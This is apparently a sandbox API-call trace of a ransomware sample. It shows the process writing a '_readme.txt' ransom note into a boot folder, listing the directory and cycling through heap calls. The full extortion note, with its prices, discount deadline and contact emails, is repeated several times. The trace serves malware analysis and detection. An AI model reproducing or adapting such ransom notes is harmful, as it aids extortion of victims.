dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0056.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.202] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.202] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0056.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.202] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0056.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.203] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.203] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.203] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x32acff0 [0056.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32acff0, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x326aa18 [0056.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.203] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.204] WriteFile (in: hFile=0x5c8, lpBuffer=0x326aa18*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x326aa18*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.204] CloseHandle (hObject=0x5c8) returned 1 [0056.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.205] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb45b50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb45b50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.205] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb45b50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb45b50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.205] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.205] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb45b50, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb45b50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb45b50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.205] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb45b50, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb45b50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb45b50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.205] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.205] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 